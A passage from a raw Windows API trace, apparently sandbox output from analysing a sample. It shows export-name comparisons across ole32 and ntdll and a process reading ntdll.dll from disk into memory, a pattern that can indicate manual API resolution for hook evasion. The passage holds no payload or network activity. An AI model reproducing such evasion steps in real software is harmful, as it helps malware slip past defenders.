returned 1 [0222.932] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgID") returned 1 [0222.932] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgIDEx") returned 1 [0222.932] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromString") returned 1 [0222.932] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0222.932] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0222.932] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0222.932] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0222.932] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0222.932] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0222.932] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0222.933] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0222.933] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0222.933] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Connect") returned -1 [0222.933] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0222.933] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0222.933] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0222.933] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CheckInitDde") returned 1 [0222.933] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CleanROTForApartment") returned 1 [0222.933] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="ClipboardProcessUninitialize") returned 1 [0222.933] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAddRefServerProcess") returned 1 [0222.933] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAicGetTokenForCOM") returned 1 [0222.933] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAllowSetForegroundWindow") returned 0 [0222.933] lstrcmpA (lpString1="CoBuildVersion", lpString2="BindMoniker") returned 1 [0222.933] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree") returned 1 [0222.933] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree64") returned 1 [0222.933] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0222.933] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0222.933] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0222.933] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0222.933] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize") returned 1 [0222.933] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize64") returned 1 [0222.933] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0222.933] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0222.933] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0222.933] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0222.933] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromOle1Class") returned 1 [0222.933] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgID") returned 1 [0222.933] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgIDEx") returned 1 [0222.933] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromString") returned 1 [0222.934] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0222.934] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0222.934] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0222.934] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0222.934] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0222.934] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0222.934] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0222.934] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0222.934] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0222.934] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Connect") returned -1 [0222.934] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0222.934] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0222.934] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0222.934] lstrcmpA (lpString1="CoBuildVersion", lpString2="CheckInitDde") returned 1 [0223.718] GetProcessHeap () returned 0x550000 [0223.718] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x412c040 | out: hHeap=0x550000) returned 1 [0223.723] GetProcessHeap () returned 0x550000 [0223.723] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x5692f0 [0223.724] LoadLibraryA (lpLibFileName="Ntdll.dll") returned 0x7ffc5f810000 [0223.724] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0223.724] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0223.724] GetModuleFileNameA (in: hModule=0x7ffc5f810000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0223.724] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0223.724] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0223.724] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0223.724] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1817160) returned 1 [0223.724] GetProcessHeap () returned 0x550000 [0223.724] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1bba48) returned 0x4127040 [0223.729] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0223.729] ReadFile (in: hFile=0x140, lpBuffer=0x4127040, nNumberOfBytesToRead=0x1bba48, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4127040*, lpNumberOfBytesRead=0x14f5a4*=0x1bba48, lpOverlapped=0x0) returned 1 [0225.277] CloseHandle (hObject=0x140) returned 1 [0225.277] lstrcmpA (lpString1="A_SHAFinal", lpString2="A_SHAFinal") returned 0 [0225.277] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAFinal") returned 1 [0225.277] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAInit") returned 0 [0225.277] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAFinal") returned 1 [0225.277] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAInit") returned 1 [0225.277] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAUpdate") returned 0 [0225.277] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAFinal") returned 1 [0225.277] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAInit") returned 1 [0225.277] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAUpdate") returned 1 [0225.277] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 0 [0225.278] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAFinal") returned 1 [0225.278] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAInit") returned 1 [0225.278] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAUpdate") returned 1 [0225.278] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.278] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcFreeCompletionListMessage") returned 0 [0225.278] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAFinal") returned 1 [0225.278] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAInit") returned 1 [0225.278] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAUpdate") returned 1 [0225.278] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.278] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.278] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcGetCompletionListLastMessageInformation") returned 0 [0225.279] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAFinal") returned 1 [0225.279] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAInit") returned 1 [0225.279] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAUpdate") returned 1 [0225.279] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.279] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.279] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0225.279] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListMessageAttributes") returned 0 [0225.279] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAFinal") returned 1 [0225.279] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAInit") returned 1 [0225.279] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAUpdate") returned 1 [0225.279] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.279] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.280] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0225.280] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0225.280] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetHeaderSize") returned 0 [0225.280] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAFinal") returned 1 [0225.280] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAInit") returned 1 [0225.280] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0225.280] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.280] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.280] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0225.280] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0225.280] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0225.280] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 0 [0225.280] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAFinal") returned 1 [0225.280] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAInit") returned 1 [0225.280] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAUpdate") returned 1 [0225.280] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.280] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.281] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0225.281] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0225.281] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0225.281] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0225.281] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 0 [0225.281] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAFinal") returned 1 [0225.281] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAInit") returned 1 [0225.281] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAUpdate") returned 1 [0225.281] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.281] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.281] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0225.281] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0225.281] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetHeaderSize") returned 1 [0225.281] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageAttribute") returned 1 [0225.281] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0225.281] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 0 [0225.281] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAFinal") returned 1 [0225.281] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAInit") returned 1 [0225.281] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0225.281] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.281] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.281] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0225.281] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0225.282] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0225.282] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 1 [0225.282] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0225.282] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0225.282] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcInitializeMessageAttribute") returned 0 [0225.282] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAFinal") returned 1 [0225.282] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAInit") returned 1 [0225.282] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAUpdate") returned 1 [0225.282] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.282] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.282] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0225.282] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0225.282] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetHeaderSize") returned 1 [0225.282] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageAttribute") returned 1 [0225.282] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0225.282] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0225.282] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcInitializeMessageAttribute") returned 1 [0225.282] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcMaxAllowedMessageLength") returned 0 [0225.282] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAFinal") returned 1 [0225.282] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAInit") returned 1 [0225.282] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0225.282] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.282] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.282] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0225.282] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0225.282] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0225.283] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0225.283] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0225.283] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0225.283] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0225.283] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0225.283] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 0 [0225.283] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0225.283] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0225.283] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0225.283] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.283] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.283] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0225.283] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0225.283] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0225.283] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0225.283] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0225.283] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0225.283] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0225.284] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0225.284] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0225.284] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 0 [0225.284] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAFinal") returned 1 [0225.284] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAInit") returned 1 [0225.284] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAUpdate") returned 1 [0225.284] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.284] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.284] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0225.284] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0225.284] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0225.284] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0225.284] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0225.284] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0225.284] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0225.284] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0225.284] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0225.284] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0225.284] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRundownCompletionList") returned 0 [0225.284] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAFinal") returned 1 [0225.284] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAInit") returned 1 [0225.284] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0225.284] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.285] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.285] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0225.285] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0225.285] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0225.285] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0225.285] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0225.285] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0225.285] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0225.285] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0225.285] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0225.285] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0225.285] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRundownCompletionList") returned 1 [0225.285] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcUnregisterCompletionList") returned 0 [0225.285] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0225.285] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0225.285] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0225.285] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.285] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.285] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0225.285] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0225.285] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0225.285] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0225.285] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0225.285] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0225.285] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0225.285] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0225.285] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0225.285] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0225.286] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRundownCompletionList") returned 1 [0225.286] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionList") returned 1 [0225.286] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 0 [0225.286] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAFinal") returned 1 [0225.286] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAInit") returned 1 [0225.286] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAUpdate") returned 1 [0225.286] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.286] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.286] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0225.286] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0225.286] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", 